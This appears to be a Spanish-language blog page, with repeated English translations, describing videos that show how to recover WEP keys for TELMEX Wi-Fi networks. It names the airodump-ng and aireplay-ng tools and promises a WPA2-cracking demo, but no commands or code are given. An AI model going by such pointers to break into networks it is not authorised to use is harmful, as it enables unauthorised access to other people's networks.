Demostración de cómo desencriptar una contraseña de acceso a internet inalámbrico (TELMEX) bajo el cifrado WEP. La calidad del video es baja debido a que se tomó con una cámara fotográfica, pero el sonido es nitido. Para cualquier duda por favor visiten: http://alfonsocruz.blogspot.com y se harán todas las aclaraciones. Realizado por Alfonso Cruz (soporte) alumnos del INSTITUTO TECNOLÓGICO DE CULIACÁN. Como recomendación: eviten utilizar el cifrado WEP de 64 bits ya que con tan sólo 20 min aprox se puede encontrar la clave de la red. Recomiendo utilizar un cifrado más fuerte como WPA2/PSK (aunque proximamente haré la demostración para romper este cifrado).



Then I show how to decode the capture WEP packages.
To do this we must keep records. Or cap. IVs that resulted from the capture with airodump-ng and aireplay-ng.
Demonstrating how to decrypt a password for access to wireless internet (TELMEX) under the WEP encryption. The video quality is low because it was taken with a camera, but the sound is crisp. For any questions please visit: http://alfonsocruz.blogspot.com and made all the clarifications. Produced by Alfonso Cruz (support) students of the Technological Institute of Culiacan. As recommendation: avoid using the 64-bit WEP encryption because with only about 20 minutes to find the key to the network. I recommend using a stronger encryption as WPA2/PSK (although I will soon demonstration to break this encryption).


Cómo usar airodump-ng by soporte (1 de 3) Desencriptar WEP




Demostración de cómo desencriptar una contraseña de acceso a internet inalámbrico (TELMEX) bajo el cifrado WEP. Realizado por Alfonso Cruz (soporte) alumno del INSTITUTO TECNOLÓGICO DE CULIACÁN. Como recomendación: eviten utilizar el cifrado WEP de 64 bits ya que con tan sólo 20 min aprox se puede encontrar la clave de la red. Recomiendo utilizar un cifrado más fuerte como WPA2/PSK (aunque proximamente haré la demostración para romper este cifrado).




Demonstrating how to decrypt a password for access to wireless internet (TELMEX) under the WEP encryption. Produced by Alfonso Cruz (support) student of the Technological Institute of Culiacan. As recommendation: avoid using the 64-bit WEP encryption because with only about 20 minutes to find the key to the network. I recommend using a stronger encryption as WPA2/PSK (although I will soon demonstration to break this encryption).

Cómo desencriptar una contraseña bajo en cifrado WEP (Volumen 2)




En este segundo video pueden apreciar el uso de los comandos necesarios para la aceleración de la captura de paquetes y la desencriptación de los mismos.
Si tienen alguna duda ps aqui la solucionamos.

Demostración de cómo desencriptar una contraseña de acceso a internet inalámbrico (TELMEX) bajo el cifrado WEP. La calidad del video es baja debido a que se tomó con una cámara fotográfica, pero el sonido es nitido. Para cualquier duda por favor visiten: http://alfonsocruz.blogspot.com y se harán todas las aclaraciones. Realizado por Alfonso Cruz (soporte) alumno del INSTITUTO TECNOLÓGICO DE CULIACÁN.

Disculpen la baja calidad del video, utilice mi camara fotográfica para la grabación del video.

Cómo desencriptar una contraseña bajo en cifrado WEP (Volumen 1)


Demostración de cómo desencriptar una contraseña de acceso a internet inalámbrico (TELMEX) bajo el cifrado WEP. La calidad del video es baja debido a que se tomó con una cámara fotográfica, pero el sonido es nitido. Para cualquier duda por favor visiten: http://alfonsocruz.blogspot.com y se harán todas las aclaraciones. Realizado por Alfonso Cruz (soporte) alumnos del INSTITUTO TECNOLÓGICO DE CULIACÁN. Como recomendación: eviten utilizar el cifrado WEP de 64 bits ya que con tan sólo 20 min aprox se puede encontrar la clave de la red. Recomiendo utilizar un cifrado más fuerte como WPA2/PSK (aunque proximamente haré la demostración para romper este cifrado).

Etiquetas

INTERNET (459) newsweek (305) SEGURIDAD (224) software (136) HACK (86) GOOGLE (47) Hacker (46) Geek (41) hardware (36) WINDOWS (34) Hackers (31) CRACK (29) facebook (29) video (28) DESCARGA (27) videos (26) Celulares (25) MICROSOFT (22) Informatica (21) apple (19) GRATIS (18) technology (18) virus (18) exploit (17) computación (16) informatico (16) web (15) cracker (14) INALAMBRICO (13) WINDOWS 7 (13) noticias (11) MSN (10) termino (10) ACTUALIZACION (9) Gamer (9) LapTops (9) Mac (9) PASSWORD (9) WINDOWS XP (9) dns (9) firefox (9) juegos (9) FOTOS (8) cientifico (8) iphone (8) WEP (7) antivirus (7) bibliografia (7) Desencriptar (6) INFINITUM (6) wifi (6) youtube (6) Craker (5) Culiacan (5) DESMOSTRACION (5) TELEFONIA (5) gmail (5) messenger (5) DIRECTA (4) DOWNLOAD (4) ESPAÑOL (4) XBOX (4) xss (4) Glosario (3) HTML (3) WPA (3) anuncios (3) ataques (3) hosting (3) hotmail (3) Guru (2) ajax (2) wpa2 (2)